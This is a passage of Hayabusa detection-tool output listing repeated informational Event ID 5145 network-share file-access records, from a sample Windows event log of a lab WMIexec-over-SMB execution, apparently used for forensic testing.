10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 